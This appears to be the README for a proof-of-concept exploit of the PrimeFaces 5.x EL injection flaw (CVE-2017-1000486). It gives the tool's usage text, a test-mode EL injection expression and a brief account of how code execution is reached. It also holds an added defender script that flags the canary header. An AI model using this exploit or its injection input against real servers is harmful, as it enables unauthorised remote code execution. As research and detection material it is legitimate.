Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486), an expression-language injection that yields remote code execution (RCE) on the target.
You can find an excellent description of the vulnerability on the Minded Security blog.
The exploit provides a help function that prints all important parameters:
    ./primefaces.py --help
    PrimeFaces 5.x EL injection exploit (CVE-2017-1000486) by MOGWAI LABS
    =====================================================================
    usage: primefaces.py [-h] [-t] [-e EXTENSION] url [payload]

    PrimeFaces 5.x EL injection exploit

    positional arguments:
      url                   The target URL (http/https)
      payload               File with the JavaScript (Rino/Nashorn) code to
                            execute or OS command

    optional arguments:
      -h, --help            show this help message and exit
      -t, --test            Test mode (off by default)
      -e EXTENSION, --extension EXTENSION
                            Extension of the target (xhtml, jsf)
The exploit provides a simple test mode (-t parameter) that can be used to verify whether a target is actually vulnerable. It works by sending the following EL expression to the target, which adds an extra header field to the HTTP response; the exploit then checks for that header:
    ${facesContext.getExternalContext().setResponseHeader("MOGWAILABS","CHKCHK")}
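A defender-side check, added here as an example and not part of this exploit's code: it parses captured HTTP responses (from a proxy, IDS or WAF) and flags the MOGWAILABS canary header that the test mode makes a vulnerable PrimeFaces host emit. The sample responses in the block are constructed.

```python
# Added example, not from the exploit repository: flag HTTP responses carrying the
# canary header that the exploit's -t test mode makes a vulnerable host emit.
from typing import Dict, List, Optional

CANARY_HEADER = "mogwailabs"  # header name set by the test-mode EL expression
CANARY_VALUE = "chkchk"       # value it carries (compared case-insensitively)


def parse_response_head(raw: bytes) -> Optional[Dict[str, List[str]]]:
    """Parse status line and headers of a raw HTTP/1.x response into
    {lower-cased name: [values]}; None if there is no HTTP status line."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    if not lines or not lines[0].startswith(b"HTTP/"):
        return None
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            continue  # skip malformed lines rather than aborting the scan
        key = name.strip().decode("latin-1").lower()  # latin-1 never raises
        headers.setdefault(key, []).append(value.strip().decode("latin-1"))
    return headers


def canary_value(raw: bytes) -> Optional[str]:
    """Value of the canary header if present (any value is suspicious), else None."""
    headers = parse_response_head(raw)
    if headers is None:
        return None
    values = headers.get(CANARY_HEADER)
    return values[0] if values else None


def is_confirmed_canary(raw: bytes) -> bool:
    """True only when the header carries exactly the value the exploit checks for."""
    value = canary_value(raw)
    return value is not None and value.lower() == CANARY_VALUE


# Constructed sample traffic: a response from an exploited host and a benign one.
EXPLOITED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
             b"MogwaiLabs: CHKCHK\r\nContent-Length: 0\r\n\r\n")
BENIGN = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    for label, resp in (("exploited", EXPLOITED), ("benign", BENIGN)):
        print(label, "->", "ALERT" if is_confirmed_canary(resp) else "clean")
```

Any response carrying the header name at all is worth an alert, since a benign application has no reason to emit it; the exact value only confirms it was this tool's test mode.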
Actual exploitation works by invoking the JavaScript interpreter that is bundled with the Java VM, which allows arbitrary Java code to be executed from JavaScript.
The exploit provides two example payloads:
- payload.js (Execute an OS command)
- sleep.js (Sleep for 4 seconds, causing a delay of the response)
Please note that neither of these examples returns the output of the command.